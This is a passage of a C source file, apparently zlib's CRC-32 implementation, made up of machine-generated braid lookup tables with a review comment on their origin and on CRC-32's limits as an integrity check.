0x4d8c14fa00000000, 0x9c1b447800000000, 0x2c32244500000000, 0xfc48840200000000, 0x4c61e43f00000000, 0x5cbdc48d00000000, 0xec94a4b000000000, 0x3cee04f700000000, 0x8cc764ca00000000}, {0x0000000000000000, 0xa5d35ccb00000000, 0x0ba1c84d00000000, 0xae72948600000000, 0x1642919b00000000, 0xb391cd5000000000, 0x1de359d600000000, 0xb830051d00000000, 0x6d8253ec00000000, 0xc8510f2700000000, 0x66239ba100000000, 0xc3f0c76a00000000, 0x7bc0c27700000000, 0xde139ebc00000000, 0x70610a3a00000000, 0xd5b256f100000000, 0x9b02d60300000000, 0x3ed18ac800000000, 0x90a31e4e00000000, 0x3570428500000000, 0x8d40479800000000, 0x28931b5300000000, 0x86e18fd500000000, 0x2332d31e00000000, 0xf68085ef00000000, 0x5353d92400000000, 0xfd214da200000000, 0x58f2116900000000, 0xe0c2147400000000, 0x451148bf00000000, 0xeb63dc3900000000, 0x4eb080f200000000, 0x3605ac0700000000, 0x93d6f0cc00000000, 0x3da4644a00000000, 0x9877388100000000, 0x20473d9c00000000, 0x8594615700000000, 0x2be6f5d100000000, 0x8e35a91a00000000, 0x5b87ffeb00000000, 0xfe54a32000000000, 0x502637a600000000, 0xf5f56b6d00000000, 0x4dc56e7000000000, 0xe81632bb00000000, 0x4664a63d00000000, 0xe3b7faf600000000, 0xad077a0400000000, 0x08d426cf00000000, 0xa6a6b24900000000, 0x0375ee8200000000, 0xbb45eb9f00000000, 0x1e96b75400000000, 0xb0e423d200000000, 0x15377f1900000000, 0xc08529e800000000, 0x6556752300000000, 0xcb24e1a500000000, 0x6ef7bd6e00000000, 0xd6c7b87300000000, 0x7314e4b800000000, 0xdd66703e00000000, 0x78b52cf500000000, 0x6c0a580f00000000, 0xc9d904c400000000, 0x67ab904200000000, 0xc278cc8900000000, 0x7a48c99400000000, 0xdf9b955f00000000, 0x71e901d900000000, 0xd43a5d1200000000, 0x01880be300000000, 0xa45b572800000000, 0x0a29c3ae00000000, 0xaffa9f6500000000, 0x17ca9a7800000000, 0xb219c6b300000000, 0x1c6b523500000000, 0xb9b80efe00000000, 0xf7088e0c00000000, 0x52dbd2c700000000, 0xfca9464100000000, 0x597a1a8a00000000, 0xe14a1f9700000000, 0x4499435c00000000, 0xeaebd7da00000000, 0x4f388b1100000000, 0x9a8adde000000000, 0x3f59812b00000000, 
0x912b15ad00000000, 0x34f8496600000000, 0x8cc84c7b00000000, 0x291b10b000000000, 0x8769843600000000, 0x22bad8fd00000000, 0x5a0ff40800000000, 0xffdca8c300000000, 0x51ae3c4500000000, 0xf47d608e00000000, 0x4c4d659300000000, 0xe99e395800000000, 0x47ecadde00000000, 0xe23ff11500000000, 0x378da7e400000000, 0x925efb2f00000000, 0x3c2c6fa900000000, 0x99ff336200000000, 0x21cf367f00000000, 0x841c6ab400000000, 0x2a6efe3200000000, 0x8fbda2f900000000, 0xc10d220b00000000, 0x64de7ec000000000, 0xcaacea4600000000, 0x6f7fb68d00000000, 0xd74fb39000000000, 0x729cef5b00000000, 0xdcee7bdd00000000, 0x793d271600000000, 0xac8f71e700000000, 0x095c2d2c00000000, 0xa72eb9aa00000000, 0x02fde56100000000, 0xbacde07c00000000, 0x1f1ebcb700000000, 0xb16c283100000000, 0x14bf74fa00000000, 0xd814b01e00000000, 0x7dc7ecd500000000, 0xd3b5785300000000, 0x7666249800000000, 0xce56218500000000, 0x6b857d4e00000000, 0xc5f7e9c800000000, 0x6024b50300000000, 0xb596e3f200000000, 0x1045bf3900000000, 0xbe372bbf00000000, 0x1be4777400000000, 0xa3d4726900000000, 0x06072ea200000000, 0xa875ba2400000000, 0x0da6e6ef00000000, 0x4316661d00000000, 0xe6c53ad600000000, 0x48b7ae5000000000, 0xed64f29b00000000, 0x5554f78600000000, 0xf087ab4d00000000, 0x5ef53fcb00000000, 0xfb26630000000000, 0x2e9435f100000000, 0x8b47693a00000000, 0x2535fdbc00000000, 0x80e6a17700000000, 0x38d6a46a00000000, 0x9d05f8a100000000, 0x33776c2700000000, 0x96a430ec00000000, 0xee111c1900000000, 0x4bc240d200000000, 0xe5b0d45400000000, 0x4063889f00000000, 0xf8538d8200000000, 0x5d80d14900000000, 0xf3f245cf00000000, 0x5621190400000000, 0x83934ff500000000, 0x2640133e00000000, 0x883287b800000000, 0x2de1db7300000000, 0x95d1de6e00000000, 0x300282a500000000, 0x9e70162300000000, 0x3ba34ae800000000, 0x7513ca1a00000000, 0xd0c096d100000000, 0x7eb2025700000000, 0xdb615e9c00000000, 0x63515b8100000000, 0xc682074a00000000, 0x68f093cc00000000, 0xcd23cf0700000000, 0x189199f600000000, 0xbd42c53d00000000, 0x133051bb00000000, 0xb6e30d7000000000, 0x0ed3086d00000000, 0xab0054a600000000, 
0x0572c02000000000, 0xa0a19ceb00000000, 0xb41ee81100000000, 0x11cdb4da00000000, 0xbfbf205c00000000, 0x1a6c7c9700000000, 0xa25c798a00000000, 0x078f254100000000, 0xa9fdb1c700000000, 0x0c2eed0c00000000, 0xd99cbbfd00000000, 0x7c4fe73600000000, 0xd23d73b000000000, 0x77ee2f7b00000000, 0xcfde2a6600000000, 0x6a0d76ad00000000, 0xc47fe22b00000000, 0x61acbee000000000, 0x2f1c3e1200000000, 0x8acf62d900000000, 0x24bdf65f00000000, 0x816eaa9400000000, 0x395eaf8900000000, 0x9c8df34200000000, 0x32ff67c400000000, 0x972c3b0f00000000, 0x429e6dfe00000000, 0xe74d313500000000, 0x493fa5b300000000, 0xececf97800000000, 0x54dcfc6500000000, 0xf10fa0ae00000000, 0x5f7d342800000000, 0xfaae68e300000000, 0x821b441600000000, 0x27c818dd00000000, 0x89ba8c5b00000000, 0x2c69d09000000000, 0x9459d58d00000000, 0x318a894600000000, 0x9ff81dc000000000, 0x3a2b410b00000000, 0xef9917fa00000000, 0x4a4a4b3100000000, 0xe438dfb700000000, 0x41eb837c00000000, 0xf9db866100000000, 0x5c08daaa00000000, 0xf27a4e2c00000000, 0x57a912e700000000, 0x1919921500000000, 0xbccacede00000000, 0x12b85a5800000000, 0xb76b069300000000, 0x0f5b038e00000000, 0xaa885f4500000000, 0x04facbc300000000, 0xa129970800000000, 0x749bc1f900000000, 0xd1489d3200000000, 0x7f3a09b400000000, 0xdae9557f00000000, 0x62d9506200000000, 0xc70a0ca900000000, 0x6978982f00000000, 0xccabc4e400000000}, {0x0000000000000000, 0xb40b77a600000000, 0x29119f9700000000, 0x9d1ae83100000000, 0x13244ff400000000, 0xa72f385200000000, 0x3a35d06300000000, 0x8e3ea7c500000000, 0x674eef3300000000, 0xd345989500000000, 0x4e5f70a400000000, 0xfa54070200000000, 0x746aa0c700000000, 0xc061d76100000000, 0x5d7b3f5000000000, 0xe97048f600000000, 0xce9cde6700000000, 0x7a97a9c100000000, 0xe78d41f000000000, 0x5386365600000000, 0xddb8919300000000, 0x69b3e63500000000, 0xf4a90e0400000000, 0x40a279a200000000, 0xa9d2315400000000, 0x1dd946f200000000, 0x80c3aec300000000, 0x34c8d96500000000, 0xbaf67ea000000000, 0x0efd090600000000, 0x93e7e13700000000, 0x27ec969100000000, 0x9c39bdcf00000000, 
0x2832ca6900000000, 0xb528225800000000, 0x012355fe00000000, 0x8f1df23b00000000, 0x3b16859d00000000, 0xa60c6dac00000000, 0x12071a0a00000000, 0xfb7752fc00000000, 0x4f7c255a00000000, 0xd266cd6b00000000, 0x666dbacd00000000, 0xe8531d0800000000, 0x5c586aae00000000, 0xc142829f00000000, 0x7549f53900000000, 0x52a563a800000000, 0xe6ae140e00000000, 0x7bb4fc3f00000000, 0xcfbf8b9900000000, 0x41812c5c00000000, 0xf58a5bfa00000000, 0x6890b3cb00000000, 0xdc9bc46d00000000, 0x35eb8c9b00000000, 0x81e0fb3d00000000, 0x1cfa130c00000000, 0xa8f164aa00000000, 0x26cfc36f00000000, 0x92c4b4c900000000, 0x0fde5cf800000000, 0xbbd52b5e00000000, 0x79750b4400000000, 0xcd7e7ce200000000, 0x506494d300000000, 0xe46fe37500000000, 0x6a5144b000000000, 0xde5a331600000000, 0x4340db2700000000, 0xf74bac8100000000, 0x1e3be47700000000, 0xaa3093d100000000, 0x372a7be000000000, 0x83210c4600000000, 0x0d1fab8300000000, 0xb914dc2500000000, 0x240e341400000000, 0x900543b200000000, 0xb7e9d52300000000, 0x03e2a28500000000, 0x9ef84ab400000000, 0x2af33d1200000000, 0xa4cd9ad700000000, 0x10c6ed7100000000, 0x8ddc054000000000, 0x39d772e600000000, 0xd0a73a1000000000, 0x64ac4db600000000, 0xf9b6a58700000000, 0x4dbdd22100000000, 0xc38375e400000000, 0x7788024200000000, 0xea92ea7300000000, 0x5e999dd500000000, 0xe54cb68b00000000, 0x5147c12d00000000, 0xcc5d291c00000000, 0x78565eba00000000, 0xf668f97f00000000, 0x42638ed900000000, 0xdf7966e800000000, 0x6b72114e00000000, 0x820259b800000000, 0x36092e1e00000000, 0xab13c62f00000000, 0x1f18b18900000000, 0x9126164c00000000, 0x252d61ea00000000, 0xb83789db00000000, 0x0c3cfe7d00000000, 0x2bd068ec00000000, 0x9fdb1f4a00000000, 0x02c1f77b00000000, 0xb6ca80dd00000000, 0x38f4271800000000, 0x8cff50be00000000, 0x11e5b88f00000000, 0xa5eecf2900000000, 0x4c9e87df00000000, 0xf895f07900000000, 0x658f184800000000, 0xd1846fee00000000, 0x5fbac82b00000000, 0xebb1bf8d00000000, 0x76ab57bc00000000, 0xc2a0201a00000000, 0xf2ea168800000000, 0x46e1612e00000000, 0xdbfb891f00000000, 0x6ff0feb900000000, 0xe1ce597c00000000, 
0x55c52eda00000000, 0xc8dfc6eb00000000, 0x7cd4b14d00000000, 0x95a4f9bb00000000, 0x21af8e1d00000000, 0xbcb5662c00000000, 0x08be118a00000000, 0x8680b64f00000000, 0x328bc1e900000000, 0xaf9129d800000000, 0x1b9a5e7e00000000, 0x3c76c8ef00000000, 0x887dbf4900000000, 0x1567577800000000, 0xa16c20de00000000, 0x2f52871b00000000, 0x9b59f0bd00000000, 0x0643188c00000000, 0xb2486f2a00000000, 0x5b3827dc00000000, 0xef33507a00000000, 0x7229b84b00000000, 0xc622cfed00000000, 0x481c682800000000, 0xfc171f8e00000000, 0x610df7bf00000000, 0xd506801900000000, 0x6ed3ab4700000000, 0xdad8dce100000000, 0x47c234d000000000, 0xf3c9437600000000, 0x7df7e4b300000000, 0xc9fc931500000000, 0x54e67b2400000000, 0xe0ed0c8200000000, 0x099d447400000000, 0xbd9633d200000000, 0x208cdbe300000000, 0x9487ac4500000000, 0x1ab90b8000000000, 0xaeb27c2600000000, 0x33a8941700000000, 0x87a3e3b100000000, 0xa04f752000000000, 0x1444028600000000, 0x895eeab700000000, 0x3d559d1100000000, 0xb36b3ad400000000, 0x07604d7200000000, 0x9a7aa54300000000, 0x2e71d2e500000000, 0xc7019a1300000000, 0x730aedb500000000, 0xee10058400000000, 0x5a1b722200000000, 0xd425d5e700000000, 0x602ea24100000000, 0xfd344a7000000000, 0x493f3dd600000000, 0x8b9f1dcc00000000, 0x3f946a6a00000000, 0xa28e825b00000000, 0x1685f5fd00000000, 0x98bb523800000000, 0x2cb0259e00000000, 0xb1aacdaf00000000, 0x05a1ba0900000000, 0xecd1f2ff00000000, 0x58da855900000000, 0xc5c06d6800000000, 0x71cb1ace00000000, 0xfff5bd0b00000000, 0x4bfecaad00000000, 0xd6e4229c00000000, 0x62ef553a00000000, 0x4503c3ab00000000, 0xf108b40d00000000, 0x6c125c3c00000000, 0xd8192b9a00000000, 0x56278c5f00000000, 0xe22cfbf900000000, 0x7f3613c800000000, 0xcb3d646e00000000, 0x224d2c9800000000, 0x96465b3e00000000, 0x0b5cb30f00000000, 0xbf57c4a900000000, 0x3169636c00000000, 0x856214ca00000000, 0x1878fcfb00000000, 0xac738b5d00000000, 0x17a6a00300000000, 0xa3add7a500000000, 0x3eb73f9400000000, 0x8abc483200000000, 0x0482eff700000000, 0xb089985100000000, 0x2d93706000000000, 0x999807c600000000, 0x70e84f3000000000, 
0xc4e3389600000000, 0x59f9d0a700000000, 0xedf2a70100000000, 0x63cc00c400000000, 0xd7c7776200000000, 0x4add9f5300000000, 0xfed6e8f500000000, 0xd93a7e6400000000, 0x6d3109c200000000, 0xf02be1f300000000, 0x4420965500000000, 0xca1e319000000000, 0x7e15463600000000, 0xe30fae0700000000, 0x5704d9a100000000, 0xbe74915700000000, 0x0a7fe6f100000000, 0x97650ec000000000, 0x236e796600000000, 0xad50dea300000000, 0x195ba90500000000, 0x8441413400000000, 0x304a369200000000}, {0x0000000000000000, 0x9e00aacc00000000, 0x7d07254200000000, 0xe3078f8e00000000, 0xfa0e4a8400000000, 0x640ee04800000000, 0x87096fc600000000, 0x1909c50a00000000, 0xb51be5d300000000, 0x2b1b4f1f00000000, 0xc81cc09100000000, 0x561c6a5d00000000, 0x4f15af5700000000, 0xd115059b00000000, 0x32128a1500000000, 0xac1220d900000000, 0x2b31bb7c00000000, 0xb53111b000000000, 0x56369e3e00000000, 0xc83634f200000000, 0xd13ff1f800000000, 0x4f3f5b3400000000, 0xac38d4ba00000000, 0x32387e7600000000, 0x9e2a5eaf00000000, 0x002af46300000000, 0xe32d7bed00000000, 0x7d2dd12100000000, 0x6424142b00000000, 0xfa24bee700000000, 0x1923316900000000, 0x87239ba500000000, 0x566276f900000000, 0xc862dc3500000000, 0x2b6553bb00000000, 0xb565f97700000000, 0xac6c3c7d00000000, 0x326c96b100000000, 0xd16b193f00000000, 0x4f6bb3f300000000, 0xe379932a00000000, 0x7d7939e600000000, 0x9e7eb66800000000, 0x007e1ca400000000, 0x1977d9ae00000000, 0x8777736200000000, 0x6470fcec00000000, 0xfa70562000000000, 0x7d53cd8500000000, 0xe353674900000000, 0x0054e8c700000000, 0x9e54420b00000000, 0x875d870100000000, 0x195d2dcd00000000, 0xfa5aa24300000000, 0x645a088f00000000, 0xc848285600000000, 0x5648829a00000000, 0xb54f0d1400000000, 0x2b4fa7d800000000, 0x324662d200000000, 0xac46c81e00000000, 0x4f41479000000000, 0xd141ed5c00000000, 0xedc29d2900000000, 0x73c237e500000000, 0x90c5b86b00000000, 0x0ec512a700000000, 0x17ccd7ad00000000, 0x89cc7d6100000000, 0x6acbf2ef00000000, 0xf4cb582300000000, 0x58d978fa00000000, 0xc6d9d23600000000, 0x25de5db800000000, 0xbbdef77400000000, 
0xa2d7327e00000000, 0x3cd798b200000000, 0xdfd0173c00000000, 0x41d0bdf000000000, 0xc6f3265500000000, 0x58f38c9900000000, 0xbbf4031700000000, 0x25f4a9db00000000, 0x3cfd6cd100000000, 0xa2fdc61d00000000, 0x41fa499300000000, 0xdffae35f00000000, 0x73e8c38600000000, 0xede8694a00000000, 0x0eefe6c400000000, 0x90ef4c0800000000, 0x89e6890200000000, 0x17e623ce00000000, 0xf4e1ac4000000000, 0x6ae1068c00000000, 0xbba0ebd000000000, 0x25a0411c00000000, 0xc6a7ce9200000000, 0x58a7645e00000000, 0x41aea15400000000, 0xdfae0b9800000000, 0x3ca9841600000000, 0xa2a92eda00000000, 0x0ebb0e0300000000, 0x90bba4cf00000000, 0x73bc2b4100000000, 0xedbc818d00000000, 0xf4b5448700000000, 0x6ab5ee4b00000000, 0x89b261c500000000, 0x17b2cb0900000000, 0x909150ac00000000, 0x0e91fa6000000000, 0xed9675ee00000000, 0x7396df2200000000, 0x6a9f1a2800000000, 0xf49fb0e400000000, 0x17983f6a00000000, 0x899895a600000000, 0x258ab57f00000000, 0xbb8a1fb300000000, 0x588d903d00000000, 0xc68d3af100000000, 0xdf84fffb00000000, 0x4184553700000000, 0xa283dab900000000, 0x3c83707500000000, 0xda853b5300000000, 0x4485919f00000000, 0xa7821e1100000000, 0x3982b4dd00000000, 0x208b71d700000000, 0xbe8bdb1b00000000, 0x5d8c549500000000, 0xc38cfe5900000000, 0x6f9ede8000000000, 0xf19e744c00000000, 0x1299fbc200000000, 0x8c99510e00000000, 0x9590940400000000, 0x0b903ec800000000, 0xe897b14600000000, 0x76971b8a00000000, 0xf1b4802f00000000, 0x6fb42ae300000000, 0x8cb3a56d00000000, 0x12b30fa100000000, 0x0bbacaab00000000, 0x95ba606700000000, 0x76bdefe900000000, 0xe8bd452500000000, 0x44af65fc00000000, 0xdaafcf3000000000, 0x39a840be00000000, 0xa7a8ea7200000000, 0xbea12f7800000000, 0x20a185b400000000, 0xc3a60a3a00000000, 0x5da6a0f600000000, 0x8ce74daa00000000, 0x12e7e76600000000, 0xf1e068e800000000, 0x6fe0c22400000000, 0x76e9072e00000000, 0xe8e9ade200000000, 0x0bee226c00000000, 0x95ee88a000000000, 0x39fca87900000000, 0xa7fc02b500000000, 0x44fb8d3b00000000, 0xdafb27f700000000, 0xc3f2e2fd00000000, 0x5df2483100000000, 0xbef5c7bf00000000, 0x20f56d7300000000, 
0xa7d6f6d600000000, 0x39d65c1a00000000, 0xdad1d39400000000, 0x44d1795800000000, 0x5dd8bc5200000000, 0xc3d8169e00000000, 0x20df991000000000, 0xbedf33dc00000000, 0x12cd130500000000, 0x8ccdb9c900000000, 0x6fca364700000000, 0xf1ca9c8b00000000, 0xe8c3598100000000, 0x76c3f34d00000000, 0x95c47cc300000000, 0x0bc4d60f00000000, 0x3747a67a00000000, 0xa9470cb600000000, 0x4a40833800000000, 0xd44029f400000000, 0xcd49ecfe00000000, 0x5349463200000000, 0xb04ec9bc00000000, 0x2e4e637000000000, 0x825c43a900000000, 0x1c5ce96500000000, 0xff5b66eb00000000, 0x615bcc2700000000, 0x7852092d00000000, 0xe652a3e100000000, 0x05552c6f00000000, 0x9b5586a300000000, 0x1c761d0600000000, 0x8276b7ca00000000, 0x6171384400000000, 0xff71928800000000, 0xe678578200000000, 0x7878fd4e00000000, 0x9b7f72c000000000, 0x057fd80c00000000, 0xa96df8d500000000, 0x376d521900000000, 0xd46add9700000000, 0x4a6a775b00000000, 0x5363b25100000000, 0xcd63189d00000000, 0x2e64971300000000, 0xb0643ddf00000000, 0x6125d08300000000, 0xff257a4f00000000, 0x1c22f5c100000000, 0x82225f0d00000000, 0x9b2b9a0700000000, 0x052b30cb00000000, 0xe62cbf4500000000, 0x782c158900000000, 0xd43e355000000000, 0x4a3e9f9c00000000, 0xa939101200000000, 0x3739bade00000000, 0x2e307fd400000000, 0xb030d51800000000, 0x53375a9600000000, 0xcd37f05a00000000, 0x4a146bff00000000, 0xd414c13300000000, 0x37134ebd00000000, 0xa913e47100000000, 0xb01a217b00000000, 0x2e1a8bb700000000, 0xcd1d043900000000, 0x531daef500000000, 0xff0f8e2c00000000, 0x610f24e000000000, 0x8208ab6e00000000, 0x1c0801a200000000, 0x0501c4a800000000, 0x9b016e6400000000, 0x7806e1ea00000000, 0xe6064b2600000000}};
#else /* W == 4 */
/*
  Lookup tables for the W == 4 branch of this preprocessor conditional.

  crc_braid_table has four rows of 256 z_crc_t entries. Its last row begins
  0x00000000, 0x77073096, 0xee0e612c and holds 0xedb88320 at index 128, which
  matches the standard byte-at-a-time table for the reflected CRC-32
  polynomial 0xedb88320. The crc_braid_big_table declared after it starts
  with the same values byte-swapped (0x96300777 for 0x77073096), with the
  rows in the opposite order, as far as its rows are visible here.

  NOTE(review): these look like machine-generated tables (zlib-style CRC-32
  "braid" tables) -- confirm the generator and upstream version. A single
  wrong entry gives wrong checksums without any build or run-time error, so a
  vendored copy should be compared against upstream or regenerated, never
  edited by hand.

  CRC-32 detects accidental corruption only. It is not keyed and not
  collision resistant, so it must not be relied on to detect deliberate
  tampering with the data it covers.
 */
local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xb8bc6765, 0xaa09c88b, 0x12b5afee, 0x8f629757, 0x37def032, 0x256b5fdc, 0x9dd738b9, 0xc5b428ef, 0x7d084f8a, 0x6fbde064, 0xd7018701, 0x4ad6bfb8, 0xf26ad8dd, 0xe0df7733, 0x58631056, 0x5019579f, 0xe8a530fa, 0xfa109f14, 0x42acf871, 0xdf7bc0c8, 0x67c7a7ad, 0x75720843, 0xcdce6f26, 0x95ad7f70, 0x2d111815, 0x3fa4b7fb, 
0x8718d09e, 0x1acfe827, 0xa2738f42, 0xb0c620ac, 0x087a47c9, 0xa032af3e, 0x188ec85b, 0x0a3b67b5, 0xb28700d0, 0x2f503869, 0x97ec5f0c, 0x8559f0e2, 0x3de59787, 0x658687d1, 0xdd3ae0b4, 0xcf8f4f5a, 0x7733283f, 0xeae41086, 0x525877e3, 0x40edd80d, 0xf851bf68, 0xf02bf8a1, 0x48979fc4, 0x5a22302a, 0xe29e574f, 0x7f496ff6, 0xc7f50893, 0xd540a77d, 0x6dfcc018, 0x359fd04e, 0x8d23b72b, 0x9f9618c5, 0x272a7fa0, 0xbafd4719, 0x0241207c, 0x10f48f92, 0xa848e8f7, 0x9b14583d, 0x23a83f58, 0x311d90b6, 0x89a1f7d3, 0x1476cf6a, 0xaccaa80f, 0xbe7f07e1, 0x06c36084, 0x5ea070d2, 0xe61c17b7, 0xf4a9b859, 0x4c15df3c, 0xd1c2e785, 0x697e80e0, 0x7bcb2f0e, 0xc377486b, 0xcb0d0fa2, 0x73b168c7, 0x6104c729, 0xd9b8a04c, 0x446f98f5, 0xfcd3ff90, 0xee66507e, 0x56da371b, 0x0eb9274d, 0xb6054028, 0xa4b0efc6, 0x1c0c88a3, 0x81dbb01a, 0x3967d77f, 0x2bd27891, 0x936e1ff4, 0x3b26f703, 0x839a9066, 0x912f3f88, 0x299358ed, 0xb4446054, 0x0cf80731, 0x1e4da8df, 0xa6f1cfba, 0xfe92dfec, 0x462eb889, 0x549b1767, 0xec277002, 0x71f048bb, 0xc94c2fde, 0xdbf98030, 0x6345e755, 0x6b3fa09c, 0xd383c7f9, 0xc1366817, 0x798a0f72, 0xe45d37cb, 0x5ce150ae, 0x4e54ff40, 0xf6e89825, 0xae8b8873, 0x1637ef16, 0x048240f8, 0xbc3e279d, 0x21e91f24, 0x99557841, 0x8be0d7af, 0x335cb0ca, 0xed59b63b, 0x55e5d15e, 0x47507eb0, 0xffec19d5, 0x623b216c, 0xda874609, 0xc832e9e7, 0x708e8e82, 0x28ed9ed4, 0x9051f9b1, 0x82e4565f, 0x3a58313a, 0xa78f0983, 0x1f336ee6, 0x0d86c108, 0xb53aa66d, 0xbd40e1a4, 0x05fc86c1, 0x1749292f, 0xaff54e4a, 0x322276f3, 0x8a9e1196, 0x982bbe78, 0x2097d91d, 0x78f4c94b, 0xc048ae2e, 0xd2fd01c0, 0x6a4166a5, 0xf7965e1c, 0x4f2a3979, 0x5d9f9697, 0xe523f1f2, 0x4d6b1905, 0xf5d77e60, 0xe762d18e, 0x5fdeb6eb, 0xc2098e52, 0x7ab5e937, 0x680046d9, 0xd0bc21bc, 0x88df31ea, 0x3063568f, 0x22d6f961, 0x9a6a9e04, 0x07bda6bd, 0xbf01c1d8, 0xadb46e36, 0x15080953, 0x1d724e9a, 0xa5ce29ff, 0xb77b8611, 0x0fc7e174, 0x9210d9cd, 0x2aacbea8, 0x38191146, 0x80a57623, 0xd8c66675, 0x607a0110, 0x72cfaefe, 0xca73c99b, 0x57a4f122, 0xef189647, 0xfdad39a9, 0x45115ecc, 0x764dee06, 
0xcef18963, 0xdc44268d, 0x64f841e8, 0xf92f7951, 0x41931e34, 0x5326b1da, 0xeb9ad6bf, 0xb3f9c6e9, 0x0b45a18c, 0x19f00e62, 0xa14c6907, 0x3c9b51be, 0x842736db, 0x96929935, 0x2e2efe50, 0x2654b999, 0x9ee8defc, 0x8c5d7112, 0x34e11677, 0xa9362ece, 0x118a49ab, 0x033fe645, 0xbb838120, 0xe3e09176, 0x5b5cf613, 0x49e959fd, 0xf1553e98, 0x6c820621, 0xd43e6144, 0xc68bceaa, 0x7e37a9cf, 0xd67f4138, 0x6ec3265d, 0x7c7689b3, 0xc4caeed6, 0x591dd66f, 0xe1a1b10a, 0xf3141ee4, 0x4ba87981, 0x13cb69d7, 0xab770eb2, 0xb9c2a15c, 0x017ec639, 0x9ca9fe80, 0x241599e5, 0x36a0360b, 0x8e1c516e, 0x866616a7, 0x3eda71c2, 0x2c6fde2c, 0x94d3b949, 0x090481f0, 0xb1b8e695, 0xa30d497b, 0x1bb12e1e, 0x43d23e48, 0xfb6e592d, 0xe9dbf6c3, 0x516791a6, 0xccb0a91f, 0x740cce7a, 0x66b96194, 0xde0506f1}, {0x00000000, 0x01c26a37, 0x0384d46e, 0x0246be59, 0x0709a8dc, 0x06cbc2eb, 0x048d7cb2, 0x054f1685, 0x0e1351b8, 0x0fd13b8f, 0x0d9785d6, 0x0c55efe1, 0x091af964, 0x08d89353, 0x0a9e2d0a, 0x0b5c473d, 0x1c26a370, 0x1de4c947, 0x1fa2771e, 0x1e601d29, 0x1b2f0bac, 0x1aed619b, 0x18abdfc2, 0x1969b5f5, 0x1235f2c8, 0x13f798ff, 0x11b126a6, 0x10734c91, 0x153c5a14, 0x14fe3023, 0x16b88e7a, 0x177ae44d, 0x384d46e0, 0x398f2cd7, 0x3bc9928e, 0x3a0bf8b9, 0x3f44ee3c, 0x3e86840b, 0x3cc03a52, 0x3d025065, 0x365e1758, 0x379c7d6f, 0x35dac336, 0x3418a901, 0x3157bf84, 0x3095d5b3, 0x32d36bea, 0x331101dd, 0x246be590, 0x25a98fa7, 0x27ef31fe, 0x262d5bc9, 0x23624d4c, 0x22a0277b, 0x20e69922, 0x2124f315, 0x2a78b428, 0x2bbade1f, 0x29fc6046, 0x283e0a71, 0x2d711cf4, 0x2cb376c3, 0x2ef5c89a, 0x2f37a2ad, 0x709a8dc0, 0x7158e7f7, 0x731e59ae, 0x72dc3399, 0x7793251c, 0x76514f2b, 0x7417f172, 0x75d59b45, 0x7e89dc78, 0x7f4bb64f, 0x7d0d0816, 0x7ccf6221, 0x798074a4, 0x78421e93, 0x7a04a0ca, 0x7bc6cafd, 0x6cbc2eb0, 0x6d7e4487, 0x6f38fade, 0x6efa90e9, 0x6bb5866c, 0x6a77ec5b, 0x68315202, 0x69f33835, 0x62af7f08, 0x636d153f, 0x612bab66, 0x60e9c151, 0x65a6d7d4, 0x6464bde3, 0x662203ba, 0x67e0698d, 0x48d7cb20, 0x4915a117, 0x4b531f4e, 0x4a917579, 0x4fde63fc, 0x4e1c09cb, 0x4c5ab792, 
0x4d98dda5, 0x46c49a98, 0x4706f0af, 0x45404ef6, 0x448224c1, 0x41cd3244, 0x400f5873, 0x4249e62a, 0x438b8c1d, 0x54f16850, 0x55330267, 0x5775bc3e, 0x56b7d609, 0x53f8c08c, 0x523aaabb, 0x507c14e2, 0x51be7ed5, 0x5ae239e8, 0x5b2053df, 0x5966ed86, 0x58a487b1, 0x5deb9134, 0x5c29fb03, 0x5e6f455a, 0x5fad2f6d, 0xe1351b80, 0xe0f771b7, 0xe2b1cfee, 0xe373a5d9, 0xe63cb35c, 0xe7fed96b, 0xe5b86732, 0xe47a0d05, 0xef264a38, 0xeee4200f, 0xeca29e56, 0xed60f461, 0xe82fe2e4, 0xe9ed88d3, 0xebab368a, 0xea695cbd, 0xfd13b8f0, 0xfcd1d2c7, 0xfe976c9e, 0xff5506a9, 0xfa1a102c, 0xfbd87a1b, 0xf99ec442, 0xf85cae75, 0xf300e948, 0xf2c2837f, 0xf0843d26, 0xf1465711, 0xf4094194, 0xf5cb2ba3, 0xf78d95fa, 0xf64fffcd, 0xd9785d60, 0xd8ba3757, 0xdafc890e, 0xdb3ee339, 0xde71f5bc, 0xdfb39f8b, 0xddf521d2, 0xdc374be5, 0xd76b0cd8, 0xd6a966ef, 0xd4efd8b6, 0xd52db281, 0xd062a404, 0xd1a0ce33, 0xd3e6706a, 0xd2241a5d, 0xc55efe10, 0xc49c9427, 0xc6da2a7e, 0xc7184049, 0xc25756cc, 0xc3953cfb, 0xc1d382a2, 0xc011e895, 0xcb4dafa8, 0xca8fc59f, 0xc8c97bc6, 0xc90b11f1, 0xcc440774, 0xcd866d43, 0xcfc0d31a, 0xce02b92d, 0x91af9640, 0x906dfc77, 0x922b422e, 0x93e92819, 0x96a63e9c, 0x976454ab, 0x9522eaf2, 0x94e080c5, 0x9fbcc7f8, 0x9e7eadcf, 0x9c381396, 0x9dfa79a1, 0x98b56f24, 0x99770513, 0x9b31bb4a, 0x9af3d17d, 0x8d893530, 0x8c4b5f07, 0x8e0de15e, 0x8fcf8b69, 0x8a809dec, 0x8b42f7db, 0x89044982, 0x88c623b5, 0x839a6488, 0x82580ebf, 0x801eb0e6, 0x81dcdad1, 0x8493cc54, 0x8551a663, 0x8717183a, 0x86d5720d, 0xa9e2d0a0, 0xa820ba97, 0xaa6604ce, 0xaba46ef9, 0xaeeb787c, 0xaf29124b, 0xad6fac12, 0xacadc625, 0xa7f18118, 0xa633eb2f, 0xa4755576, 0xa5b73f41, 0xa0f829c4, 0xa13a43f3, 0xa37cfdaa, 0xa2be979d, 0xb5c473d0, 0xb40619e7, 0xb640a7be, 0xb782cd89, 0xb2cddb0c, 0xb30fb13b, 0xb1490f62, 0xb08b6555, 0xbbd72268, 0xba15485f, 0xb853f606, 0xb9919c31, 0xbcde8ab4, 0xbd1ce083, 0xbf5a5eda, 0xbe9834ed}, {0x00000000, 0x191b3141, 0x32366282, 0x2b2d53c3, 0x646cc504, 0x7d77f445, 0x565aa786, 0x4f4196c7, 0xc8d98a08, 0xd1c2bb49, 0xfaefe88a, 0xe3f4d9cb, 0xacb54f0c, 
